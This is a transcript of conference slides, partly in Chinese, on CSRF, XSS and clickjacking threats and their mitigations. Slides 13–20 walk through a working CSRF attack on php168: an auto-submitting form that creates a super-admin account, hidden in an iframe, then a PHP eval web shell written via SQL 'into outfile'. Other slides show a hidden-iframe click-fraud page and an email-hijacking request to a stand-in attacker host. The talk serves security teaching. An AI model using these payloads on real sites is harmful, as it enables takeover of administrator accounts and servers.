1 / 35

TAIS 台灣學術資訊安全國際研討會 CSRF( 跨站偽冒請求 ) 攻擊的分析與防護 Cross-Site Request Forgery Threat and Mitigatio n

TAIS 台灣學術資訊安全國際研討會 CSRF( 跨站偽冒請求 ) 攻擊的分析與防護 Cross-Site Request Forgery Threat and Mitigatio n. 夏克強 麟瑞科技 資深技術顧問 CISSP, CHFI, CEH. Why Web application Vulnerable. Web Servers. Application Servers. Database Servers. Operating Systems. Operating Systems. Operating Systems. Network.

Download Presentation

TAIS 台灣學術資訊安全國際研討會 CSRF( 跨站偽冒請求 ) 攻擊的分析與防護 Cross-Site Request Forgery Threat and Mitigatio n

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. TAIS台灣學術資訊安全國際研討會CSRF(跨站偽冒請求)攻擊的分析與防護 Cross-Site Request Forgery Threat and Mitigation 夏克強 麟瑞科技 資深技術顧問 CISSP, CHFI, CEH

  2. Why Web application Vulnerable Web Servers Application Servers Database Servers Operating Systems Operating Systems Operating Systems Network Improved commercial or in-house application access to information means improved access for hackers? 75%攻擊集中於此 • 網站應用程式(Web AP) • 未上線的急於上線 • 已上線的年代久遠 SQL Injection Parameter Tampering XSS, .., etc. Database Servers Customer Info Business Data Transaction Info 個人資料 交易紀錄 客戶資料 網路 防火牆 IDS IPS

  3. OWASP TOP TEN Mapping from 2007 to 2010 Top 10 = = + + - -

  4. Cybercrime威脅  Cyber pickpocketing BEBLOH, where the malware went beyond “traditional” keylogging by not only stealing credit card information but also accessing the account and transferring funds to another account

  5. Cross-Site Scripting Reflected XSS, Stored XSS (aka Persistent XSS) Samy Worm Web sites compromised: FBI.gov, CNN.com, Time.com, Ebay, Yahoo, Apple computer, Microsoft, Zdnet, Wired, and Newsbytes Top vulnerable weakness in recent years Web sites vulnerable to XSS: searching page, forum, comment, login page.. Cross-Site Scriptingattacks Hoax Steal user’s session Id and cookies Almost full control to your browsers such as port scan, keylogger and send requests on behave of the client  

  6. Stored Cross-Site Scripting Finance Transactions Accounts Administration Communication Knowledge Mgmt E-Commerce Bus. Functions Custom Code 1 Attacker sets the trap – update my profile Application with stored XSS vulnerability Attacker enters a malicious script into a web page that stores the data on the server Victim views page – sees attacker profile 2 Script runs inside victim’s browser with full access to the DOM and cookies 3 Script silently sends attacker Victim’s session cookie

  7. Stored & Reflected XSS  Stored XSS(aka Persistent XSS) is more serious than reflected XSS  • Reflected XSS must use some means of inducing users to visit attacker’s crafted URL • Phishing attack by offering a link to his own • malicious web server would be suspected as a scam • The requirement for stored XSS is avoided  • Stored XSS guaranteed that victim users will be already accessing the application at the time that the attack strikes • Reflected XSS may try to engineer this situation • by persuading the user to log in

  8. Clickjacking是攻擊者試圖綁架使用者的滑鼠點擊,讓使用者在不知情的情況下點擊攻擊者精心設計的連結或按鈕Clickjacking是攻擊者試圖綁架使用者的滑鼠點擊,讓使用者在不知情的情況下點擊攻擊者精心設計的連結或按鈕 Clickjacking可視為是一種進階的網路釣魚手法 Clickjacking (Session-Riding)與CSRF 相似,都是讓使用者在 不自覺的狀況上當 Clickjacking與CSRF結合 對攻擊有加乘效果 Clickjacking(點擊綁架)    

  9. 使用Firefox的Noscript的ClearClick功能 阻擋iframe的執行(NoScript)或停用Javascript Frame busting(也就是anti-framing) for your own sites <script>if (top != self) top.location = location</script> IE8 针對Clickjacking增加 對Clickjacking攻擊的防禦功能 X-FRAME-OPTIONS: DENY X-FRAME-OPTIONS: SAMEORIGIN Clickjacking防禦    

  10. Forced Browsing 應用: 廣告收入 技巧: 數以千計的人點擊, 來自不同IP地址, 可以規避檢查機制 <html> <body> 空白頁 <iframe src=http://www.google.com.tw/search?hl=zh-TW &q=taiwan+taipei height=0 width=0> </body> </html>

  11. Cross-Site Request Forgery

  12. CSRFexample: 進一步 引誘你點選連結 假如你訪問的購物網站網址為: http://www.hacker.net,你購買了一個產品,購物網站參數為: http://www.hacker.net/buy.php?item=computer&quantity=1 這是一個正常的HTTP請求,商品名稱是電腦computer,購買數量是1,網站會將所買的商品與數量記錄在用戶的帳戶內。 如果黑客知道了http://www.hacker.net購物網站的操作流程,他就可以偽造一個類似的HTTP請求:http://www.hacker.net/buy.php?item=computer&quantity=1000,商品名稱是computer,而購買數量卻是1000。如果目標用戶在網站登錄期間不小心訪問了這個鏈接,那麼在他的帳戶內就是會有一條記錄是購買1000台的computer

  13. php168之CSRF攻擊 加入網站管理員的頁面為: http://192.168.0.3/php168/admin/index.php?lfj=member&job=addmember 摘錄自www.haik8.com

  14. php168之CSRF攻擊 <form name="form1" method="post" action="index.php?lfj=member&action=addmember"> <tr class="head">         <td colspan="2">添加新用户</td>      </tr>      <tr bgcolor="#FFFFFF">         <td width="37%">帐号:</td>        <td width="63%">           <input type="text" name="postdb[username]">        </td>      </tr>      <tr bgcolor="#FFFFFF">         <td width="37%">密码:</td>        <td width="63%">           <input type="password" name="postdb[passwd]">        </td>      </tr>      <tr bgcolor="#FFFFFF">         <td width="37%">重复密码:</td> <td width="63%">           <input type="password" name="postdb[passwd2]">        </td>      </tr>      <tr bgcolor="#FFFFFF"> 摘錄自www.haik8.com

  15. php168之CSRF攻擊 <td width="37%">所属用户组:<span help=1>只有超级管理员与创建人才能添加新的超级管理员,只有超级管理员与创始人及前台管理员才能添加新的前台管理员</span></td>        <td width="63%"> <select name='postdb[groupid]' ><option value='' selected>现有用户组</option>   <option value='2' >游客组</option>   <option value='3' >超级管理员</option>   <option value='4' >前台管理员</option>   <option value=''>--+以上是系统组,以下是会员组+--</option>   <option value='8' >普通会员</option>   <option value='9' >高级会员</option> </select> </td>      </tr>      <tr bgcolor="#FFFFFF">         <td width="37%">邮箱:</td>        <td width="63%">           <input type="text" name="postdb[email]">        </td>      </tr>      <tr bgcolor="#FFFFFF">         <td width="37%">&nbsp;</td>        <td width="63%">           <input type="submit" name="Submit" value="提交">        </td>      </tr>    </form> 摘錄自www.haik8.com

  16. php168之CSRF攻擊 駭客修改程式碼, 修改完的程式碼如下: <html> <body onload="document.form1.submit()"> <form name="form1" method="post" action="http://192.168.0.3/php168/admin/index.php?lfj=member&action=addmember"> <input type="hidden" name="postdb[username]" value='樱花浪子'> <input type="hidden" name="postdb[passwd]" value='nohack'>   <input type="hidden" name="postdb[passwd2]" value='nohack'> <select name='postdb[groupid]' ><option value='3' selected>    </form> </body> </html> 摘錄自www.haik8.com

  17. php168之CSRF攻擊 這樣我們得到路徑為:http://192.168.0.3/php168/upload_files/special/5_20090425170444_eA==.htm,這樣管理員在登錄前後台的情況下訪問了這個頁面就會添加一個用戶名為“櫻花浪子”、密碼為“nohack”的超級管理員 摘錄自www.haik8.com

  18. php168之CSRF攻擊 但是這樣的話會顯示添加管理員成功的提示,我們要做的隱藏點,來做一個圖片木馬 <html> <body> <iframe src=http://192.168.0.3/php168/upload_files/special/5_20090425170444_eA==.htm width=0 height=0></iframe>  <img src=/Article/UploadPic/2010-4/2010417144022600.jpg></img> </body>  <html> 得到路徑為special/5_20090426220451_PYwLh.jpg, http://192.168.0.3/php168/upload_files/ special/5_20090426220451_PYwLh.jpg 摘錄自www.haik8.com

  19. php168之CSRF攻擊 執行:“SELECT ‘<?php @eval($_POST[cmd]);?>’ into outfile ‘C:\ \AppServ\\www\\php168\\nohack.php’” 摘錄自www.haik8.com

  20. php168之CSRF攻擊 檢查一下, 顯示已經注入了!! 摘錄自www.haik8.com

  21. 行事曆系統範例 http://egw.ringline.com.tw/index.php?menuaction=calendar.calendar_uiviews.day&date=20110308

  22. CSRF, Referrer與X Headers範例 <a href=‘http://egw.ringline.com.tw/index.php?menuaction= calendar.calendar_uiviews.day&date=20101016>請點我可打折</a> Clickjacking與CSRF有加乘效果 使用iframe Opacity=30 強迫victim讀取行事曆特定日期 Countermeasures against CSRF

  23. CSRF Preventions Insert custom random tokens into every form and URL Store a single token in the session and add it to all forms and links Hidden Field: <input name="token" value="687965fdfaew87agrde" type="hidden"/> Single use URL: /accounts/687965fdfaew87agrde Form Token: /accounts?auth=687965fdfaew87agrde … For sensitive data or value transactions, re-authenticate or use transaction signing Verify Referrer header, but XHR can break it. Verify X-header. It is more effective than Referrer header due to SOP. legal example: GET /auth/update_profile.cgi?email=victim@social.site HTTP/1.1 Host: social.site X-CSRF: 1 Illegal example: <html><img src=http://social.site/auth/update_profile.cgi?email=attacker@evil.site></html> GET /auth/update_profile.cgi?email=attacker@evil.site HTTP/1.1 Host: social.site Ensure that there are no XSS vulnerabilities in your application    

  24. Ratproxy Semi-auto web application security assessment tool for XSS, CRSF Not all of the issues reported necessarily correspond to actual security flaws Findings should be validated by manual testing and analysis where appropriate

  25. Microsoft Threat Modeling Spoofing identity S T Elevation of privilege Tampering with data (integrity) E Damage potential Threats D Discoverability Reproducibility D R Denial of service D Repudiability R Rating Information disclosure I Affected users Exploitability A E

  26. Microsoft Threat Modeling 1. Identify assets 2. Create an architecture overview 3. Decompose the application 4. Identify the threats 5. Document the threats 6. Rate the threats

  27. OWASP Risk Methodology

  28. CSRF Rating Example

  29. CVSS (Metrics View)

  30. Obstacle for Code Review(or Scanners) • Can’t provide immediate protection • Web applications, change frequently. In many cases the • application can change before a full review cycle has • been completed 1 • The source code is not readily “available” or “understood” • With enough MIS staffs and time to do re-coding ? 2 • Manual code fixes are only as good as the developer 3 • Attacks, (again, especially Web attacks), also change • frequently. • No multiple services correlation capability 4 • Can’t track the accurate user who launches the attacks • and the attack patterns 5

  31. Continued • Suitable for developing phase, not for production phase • Suitable for developing phase, not for design phase • (only resolved by Risk Analysis) 6 • Slow response to compliance requirements 7 • Can’t protect web servers and backend database servers 8 • No web site cloaking such as anti Google hack 9 • Can’t provide additional insight into those that are requiring • writing to the database or are accessed by transaction only 10

  32. Obstacle for WAFs • Suitable for production phase, not for developing phase 1 • Suitable for developing phase, not for design phase • (only resolved by Risk Analysis) 2 • Lack of Logical flaws detection (only resolved by human • code review) • Applications do something insecure 3 • Can’t accurately correct application flaws 4 • WAF could go down (fail-open or fail-close) 5

  33. 問題與討論 Thank you! Michael_Shiah@ringline.com.tw 02-26512340#699

More Related